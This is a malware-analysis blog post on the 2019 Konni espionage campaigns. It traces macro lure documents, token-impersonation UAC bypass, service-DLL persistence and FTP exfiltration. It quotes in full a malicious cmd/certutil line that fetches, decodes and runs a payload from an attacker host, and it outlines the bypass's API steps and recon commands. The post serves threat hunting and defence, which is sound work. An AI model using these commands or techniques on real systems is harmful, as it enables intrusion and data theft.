A Look Into Konni 2019 Campaign

Published in

d-hunter

11 min readJan 4, 2020

Konni is a remote administration tool, observed in the wild since early 2014. The Konni malware family is potentially linked to APT37, a North-Korean cyber espionage group active since 2012. The group primary victims are South-Korean political organizations, as well as Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East.

The latest activities leveraging the Konni malware family potentially target political organizations and politically motivated victims in Russia and South-Korea. During my research, I observed 3 distinct campaigns throughout 2019: starting from January to late September.

Konni Infection chain consists of multiple stages and utilizes living-off-the-land binaries in its operation from the use of certutil.exe to download additional files and decode their content to sc.exe and reg.exe for persistence.

These campaigns leverage similar C2 infrastructure for the delivery and a specific free FTP service used for exfiltration the stolen data from the affected targets. Additionally, the macro-armed lure documents used to deliver and install the Konni payloads have similarities across all 3 campaigns.

Konni is a modular malware that collects reconnaissance data on the target machine prior to sending further modules to the victim. We were unable to find additional operations related to the Konni malware family that might reveals further capabilities and malware types used by the group associated with Konni activity.

During our analysis I found overlapping between the Konni infection chain, tools and technique used by the Syscon backdoor [1] using a service called COMSysApp to load the payload as a service DLL as a mean to achieve persistence on the victim machine. Although similarities have been observed between Konni and Syscon, at this time we can’t say with full certainty that the same threat actor is behind both operations.

Campaign Timeline

Execution flow

Konni Multi-Stage Operation

Stage 1 — Initial Execution

In mid-July 2019 I encountered with an emerging campaign delivering the Konni malware.

The threat actor behind the campaign leveraged a malicious macro-armed Microsoft Word document titled: “О ситуации на Корейском полуострове и перспективах диалога между США и КНДР” (translated to: About the situation on the Korean Peninsula and the prospect of a dialogue between the United States and the DPRK). Unlike the previously observed campaign, the August campaign potentially targeting Russian language speakers with an interest in Korean Geo-political situation, the lure document used in this campaign is written Cyrillic and contains content related to North Korean American foreign affairs.

Decoy document for 4c201f9949804e90f94fe91882cb8aad3e7daf496a7f4e792b9c7fed95ab0726

When analyzing the document, we see that the internal codepage of the lure document is 949 — ANSI/OEM Korean (Unified Hangul Code). indicating that the actor who created the document used Korean keyboard layout. This is an indication that the author is a Korean native speaker.

Document Properties. Codepage 949 is windows Korean (Unified Hangul Code)

The lure document contains VBA macro code with the following capabilities:

Changes the font color from light grey to black — to trick the victim to enable content.
Checks if windows is a 32 or 64 bit version.
Constructs and executes the command-line to download additional files

Macro code for 4c201f9949804e90f94fe91882cb8aad3e7daf496a7f4e792b9c7fed95ab0726

The document contains 3 hidden text boxes. Each text box has a hexadecimal string constructed to a command that is executed once the document is opened by the victim.

Full Command Line example: c:\windows\system32\cmd.exe /q /c copy /y %windir%\system32\certutil.exe %temp%\mx.exe && cd /d %temp% && mx -urlcache -split -f http://handicap[.]eu5.org/1.txt && mx -decode -f 1.txt 1.bat && del /f /q 1.txt && 1.bat

Certutil is a living-off the land command line utility that can be used to obtain certificate authority information and configure certificate services. Threat actors usually utilize certutil to download remote files from a given URL. It also incorporates a built-in function to decode base64-encoded files.

CMD silently copies certutil.exe into temp directory and rename it to “mx.exe” in an attempt to evade detection and then downloads 1.txt from from a remote resource: http://handicap.eu5[.]org. The text file contains a base64 encoded string that is decoded by certutil and saved as 1.bat.

The threat actor removes tracks by silently deleting 1.txt from the temp directory and then executes 1.bat.

Stage 2 — Privilege Escalation

The batch script acts as a second stage downloader and downloads two additional files, depending on the system architecture. Certutil is executed to download a txt file and decode its content. Decoding each base64 string (32-bit or 64-bit version) results in a cabinet file — setup.cab

The content of the cabinet file is then extracted into %temp% folder, and setup.cab file is deleted from the system.

Install.bat — acts as installer to ensure persistence and execute mshlpsrvc.dll.
mshlpweb.dll — acts as loader; responsible to elevate privileges.
mshlpsrvc.dll — final payload; responsible for data exfiltration.
mshlpsrvc.ini — configuration file; contains URL used by mshlpsrvc.dll

Both dropped DLL files are unsigned and packed with UPX packer.

DLL file is unsigned & UPX strings indicate file is packed

To check level of permissions, the threat actor uses net.exe. if the current user has high privileges, install.bat is executed directly. Otherwise, mshlpweb.dll is executed using rundll32.exe.

mshlpweb.dll is a loader that uses a known token impersonation technique to elevate permissions and execute install.bat with high privileges. To gain higher privileges mshlpweb.dll execute the Windows Update Standalone Installer, wusa.exe. This process runs as a high-integrity process by default, since its set to auto-elevate within its manifest.

wusa.exe manifest, autoElevate set to true

mshlpweb.dll contains an access token impersonation routine that duplicates the token of the high integrity instance of wusa.exe, and uses it to create a new cmd.exe process running under the security context of the impersonated user[2], which in turn execute the installer — install.bat.

Token Impersonation Routine

mshlpweb.dll utilize a set of standard windows API calls to duplicate the token of wusa.exe and use it to spawn high integrity instance of cmd.exe. Higher privileges are needed to execute the installer, install.bat. The technique used by the threat actor is a full fileless UAC bypass named “Cavalry” that was leaked back in March 2017 to WikiLeaks as part of “Vault 7”, a series of leaks on the US CIA that included sophisticated privilege escalation techniques used by several actors in the wild since the leakage [3]. This technique also bypasses UAC with the “AlwaysNotify” settings.

Technique flow:

wusa.exe is executed in hidden window using ShellExecuteExW;
Handle to the access token associated with wusa.exe is created.
The token object of wusa.exe is duplicated using DuplicateTokenEx. The threat actor pass “Token_all_access” as desired access, which combines all possible access rights for a token and creates a new impersonation token.

New SID with medium privileges is created and set with NtSetInformationToken to the new duplicated token to lower its mandatory integrity level.
Restricted token is then created and duplicated using NtFilterToken and DuplicateTokenEx respectively.

The new duplicated token is passed to ImpersonateLoggedOnUser.
An elevated cmd instance is spawned using CreateProcessWithLogonW function. The credentials passed as arguments to the function (Username: aaa, Domain: bbb, Password: ccc) are identical to the credentials specified in the UAC bypass implementation by FuzzySecurity, UAC-TokenMagic [4]

I used the James Forshaw’s excellent blog [6] explaining in detail how to bypass UAC using the technique above.

Konni 2nd stage and privilege escalation flow

Stage 3 — Persistence

When the installer is executed, it first stops COMSysApp, a service that manages the configuration and tracking of Component Object Model (COM)-based components, using sc.exe utility.

COMSysApp service is first configured to autostart and the binpath of the service is set to svchost.exe.
COMSysApp service is added under the “SvcHost” key as a preliminary step to its execution in the context of svchost.exe.
The malicious DLL is added as a service DLL of COMSysApp.
COMSysApp service is restarted.

Install.bat: Persistence & Execution of mshlpsrvc.dll

Once COMSysApp service is restarted the malware is loaded in memory, and the batch file is removed from the infected system. The final payload (mshlpsrvc.dll), and its configuration file (mshlpsrvc.ini) are both copied into the system32 directory from the temp directory and then deleted.

Install.bat: files copied to System32 directory

mshlpsrvc.dll Execution and Persistence flow

Stage 4 — Data Reconnaissance and Exfiltration

After ComSysApp service is restarted, a new instance of svchost.exe is spawned and loads the final payload mshlpsrvc.dll. mshlpsrvc.ini is a configuration file that was delivered together with mshlpsrv.dll in earlier stage of the attack. This file contains a Base64-encoded string with a custom key, the file is read and decoded by mshlpsrvc.dll to perform an outbound connection and download handicap[.]eu5[.]org/4.txt.

The Custom Base64 key used to decode mshlpsrvc.ini content

Data Reconnaissance

Prior to execution of any recon command to gather information from the target machine, the default codepage of the console is changed to “65001” (utf-8)

cmd /c REG ADD HKCU\Console /v CodePage /t REG_DWORD /d 65001 /f

The following information is gathered from the affected machine and sent back to the control server:

System info using: cmd /c systeminfo >%temp%\temp.ini
List of running process using: cmd /c tasklist >%temp%\temp.ini
The temp.ini file is then compressed into a cabinet file and saved to C:\Windows\TEMP: cmd /c makecab “C:\Windows\TEMP\temp.ini” “C:\Windows\TEMP\temp.cab”

The downloaded file, 4.txt, contains a base64 encoded string with the same custom key as used before. Following decoding, the file content appears to be the FTP credentials for the FTP service that acts as the command & control server for this attack. We’ve observed similar past campaigns where free FTP services were used as the C2 for other Konni and Syscon variants, staring from October 2017. [5]

Exfiltration

The data is exfiltrated in the following way:

The temp.cab is base64 encoded with the same custom key used earlier.
Encoded temp.cab is copied to a post.txt under the directory C:\Windows\TEMP.
files uploaded to the control server using “stor” command.

FTP Session — login to the C2 FTP server and data exfiltration

Data Reconnaissance and Exfiltration flow

2019 Outbursts — Konni Campaigns

During my research, I have observed 3 additional outbursts on 2019: 2 similar samples observed on January 2019, and another one on September 2019.

Monitoring the Konni family samples, and the techniques used in the various campaigns throughout the year allowed me to track the malware evolution and changes made by the APT, but also to find many similarities incorporated in every Konni campaign.

Hash Comparison

Imphash (for “import hash”) is a unique hash value assign to PE files based on the import table of the file. The hash is calculated by the library and API function names and their order within the executable. This is an efficient way of pivoting on malicious executable files that share a similar payload are most likely created by the same group.

The compiler’s linker builds the Import Address Table (IAT) based on the specific order of functions within the source file, same Imphash value indicates that the PE IAT table includes the same functions and in the same order. This is a strong evidence that ties together different payloads from different campaigns to the same threat actor.

Doc Properties Comparison

All lure documents associated with Konni activities are written in Cyrillic, and potentially target political organizations and politically motivated victims in Russia. Notwithstanding, we found that all 3 documents files’ internal codepage is set to 949 — ANSI/OEM Korean (Unified Hangul Code).

Macro Comparison

The lure document is armed with a VBA macro that essentially comprise the command line to be executed. The final command line that is composed by the macro is identical across all 3 campaigns expect of the C2 URL, where the next stager is downloaded from. In our example from the July campaign the final command line is: c:\windows\system32\cmd.exe /q /c copy /y %windir%\system32\certutil.exe %temp%\mx.exe && cd /d %temp% && mx -urlcache -split -f http://handicap.eu5[.]org/1.txt && mx -decode -f 1.txt 1.bat && del /f /q 1.txt && 1.bat

Below you can see the evolution and changes made in the macro code level throughout the Konni attacks; one notable change is the switch to hidden text boxes within the document that contain the hex representation of the commands instead using it directly in the macro.

Decoding Routine

Konni malware family use a custom base64 key to encode the content of several files in the exfiltration phase. We observed the same flow of data reconnaissance and exfiltration across all campaigns:

Typical Konni Data Reconnaissance and Exfiltration

Also, the decoding routine is identical across all Konni samples we have analyzed which indicate a code reuse by the threat actor.

Hunting for Konni

The YARA rules below were used to find additional samples of the Konni malware known in the wild. It is a combination of unique strings of the macro within the lure documents, unique strings and win API calls from the payload and unique opcode sequence taken from the decoding routine shared among all samples.